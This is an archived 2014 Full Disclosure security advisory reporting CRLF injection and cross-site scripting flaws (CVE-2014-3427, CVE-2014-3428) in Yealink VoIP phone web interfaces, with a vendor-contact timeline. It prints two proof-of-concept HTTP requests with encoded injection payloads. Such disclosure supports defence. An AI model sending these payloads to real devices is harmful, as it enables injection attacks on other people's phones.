lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20140612121632.GA13822@infiltrated.net>
Date: Thu, 12 Jun 2014 07:16:32 -0500
From: "J. Oquendo" <joquendo@...ensive.net>
To: moderators@...db.org, fulldisclosure@...lists.org,
	bugtraq@...urityfocus.com, vuln@...unia.com
Cc: voiceops@...ceops.org, voipsec@...psa.org
Subject: [FD] CVE-2014-3427 CRLF Injection and CVE-2014-3428 XSS Injection
	in Yealink VoIP Phones


I.	ADVISORY

CVE-2014-3427 CRLF Injection in Yealink VoIP Phones
CVE-2014-3428 XSS vulnerabilities in Yealink VoIP Phones

Date published:	06/12/2014
Vendor Contacted: 05/08/2014


II.	BACKGROUND

Yealink is a manufacturer of VoIP and Video products. To
minimize noise read more at:

http://www.yealink.com/Companyprofile.aspx


III.	DESCRIPTION

There are CRLF Injection and XSS vulnerabilities in Yealink
VoIP telephones. Validated on 

Firmware Version        28.72.0.2
Hardware Version        28.2.0.128.0.0.0

CRLF Injection (Header Splitting) proof of concept:

Request
GET /servlet?linepage=1&model=%0d%0a%20 ANYTHING I WANT GOES HERE &p=dsskey&q=load HTTP/1.1

In the above request, attackers can shove in code, webpages,
etc. In my tests, I have used javascript, redirects, and even
an entire web page shoved into the CRLF vulnerable inputs.


-----


The XSS vulnerability

GET /servlet?jumpto=dsskey&model=%22%20onmouseover%3dprompt%28 1337 %29%20badpuppy%3d%22&p=login&q=loginForm HTTP/1.1

Typical Cross Site Scripting.


IV.	SOLUTION

Minimize accessibility to the phone's interface.


V.	VENDOR CONTACT AND RESPONSE

05/08/2014	E-mailed security@...link.com (bounced)
05/08/2014	Created an account on Yealink's forum and
		sent message (no response for weeks)
05/26/2014	Response via e-mail from Yealink
05/26/2014	Replied to vendor I would disclose in June
06/01/2014	Reached back out to vendor for update
06/08/2014	Reached back out to vendor for update
06/11/2014	Rouched out one last time... Crickets
06/12/2014	Advisory


VI.	TOOLS USED

Burpsuite, WVS, Firefox



-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ